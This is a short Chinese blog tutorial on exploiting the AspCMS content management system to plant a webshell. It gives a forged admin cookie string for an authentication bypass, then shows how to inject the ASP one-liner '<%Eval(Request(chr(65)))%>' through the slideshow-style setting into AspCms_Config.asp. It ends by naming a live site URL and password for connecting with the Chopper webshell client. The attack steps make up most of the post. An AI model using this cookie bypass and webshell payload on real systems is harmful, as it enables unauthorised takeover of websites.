aspcms漏洞以及上传shell

Admin 2020-07-26 121人围观 ,发现0个评论

apscms漏洞复现

首先找到aspcms程序后台登录地址,然后访问home.asp是否存在,也可以用burp爬虫查看home.asp,burp扫描后台我会后几天在蚁人博客上发布,如果存在会提示尚未登录无法访问。然后重新访问home.asp。

aspcms漏洞以及上传shell Web教程 第1张

burp抓包修改cookie

声明一下:如果修改cookie 提示重新登陆的话 考虑用户名不是admin(浏览器个人感觉谷歌和火狐比较好用些)

aspcms漏洞以及上传shell Web教程 第2张

cookie内容修改如下

cookies:username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9; GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9
admin修改成管理员的用户名
1、进入后台,“扩展功能”--“幻灯片设置”--”幻灯样式”
使用chorme的审查元素功能或者firefox的firebug,总之使用能修改当前页面元素的工具就好了。将对应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><%
然后用菜刀 连接
https://www.yir6.cn/config/AspCms_Config.asp 密码:a

请发表您的评论
请关注微信公众号
微信二维码
不容错过
Powered By 蚁人博客